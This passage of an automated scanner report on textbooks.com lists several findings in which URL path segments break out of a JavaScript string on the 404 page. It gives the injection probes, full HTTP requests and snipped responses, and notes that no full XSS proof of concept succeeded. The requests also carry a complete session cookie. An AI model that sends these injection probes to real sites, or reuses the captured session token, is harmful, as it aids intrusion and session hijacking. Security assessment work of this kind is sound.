Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3628
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:52:53 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
et() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/HQL/a69fc';f9ce83581d3'

</script>
...[SNIP]...

1.22. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff4da'%3bf118a290d29 was submitted in the REST URL parameter 1. This input was echoed as ff4da';f118a290d29 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalogff4da'%3bf118a290d29/J/Law-and-Criminal-Justice.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3654
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:02 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalogff4da';f118a290d29/J/Law-and-Criminal-Justice.php'

</script>
...[SNIP]...

1.23. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0be6'%3b73ed10a5b24 was submitted in the REST URL parameter 3. This input was echoed as d0be6';73ed10a5b24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/J/d0be6'%3b73ed10a5b24 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3626
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:53:03 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/J/d0be6';73ed10a5b24'

</script>
...[SNIP]...

1.24. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99604'%3bf4e995475c0 was submitted in the REST URL parameter 1. This input was echoed as 99604';f4e995475c0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog99604'%3bf4e995475c0/L/Languages-and-Literature.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3654
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog99604';f4e995475c0/L/Languages-and-Literature.php'

</script>
...[SNIP]...

1.25. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2261e'%3bf4653620d1 was submitted in the REST URL parameter 3. This input was echoed as 2261e';f4653620d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/L/2261e'%3bf4653620d1 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3625
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:05 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
eset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog/L/2261e';f4653620d1'

</script>
...[SNIP]...

1.26. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84d85'%3bbc5dc2196f2 was submitted in the REST URL parameter 1. This input was echoed as 84d85';bc5dc2196f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog84d85'%3bbc5dc2196f2/M/Math-and-Science.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Length: 3646
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:53:04 GMT
Connection: close


<html>
<head>
<title>Textbooks.com - ... wait, what page was that you wanted?</title>
<script language='javascript' type='text/javascript' src='/js/s_code.js'></script>
<style>
   body{
       background
...[SNIP]...
chReset() {
   sObj    = document.getElementById('hpSearchText');
   if (sObj.value == '')
       sObj.value = 'Enter ISBN(s), title, author or keyword(s)';
}

   s.pageType    = 'errorPage'
   s.pageName    = '404:/Catalog84d85';bc5dc2196f2/M/Math-and-Science.php'

</script>
...[SNIP]...

1.27. http://www.textbooks.com/Catalog/M/Math-and-Science.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3252'%3b2a20df4a898 was submitted in the REST URL parameter 3. This input was echoed as a3252';2a20df4a898 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Catalog/M/a3252'%3b2a20df4a898 HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
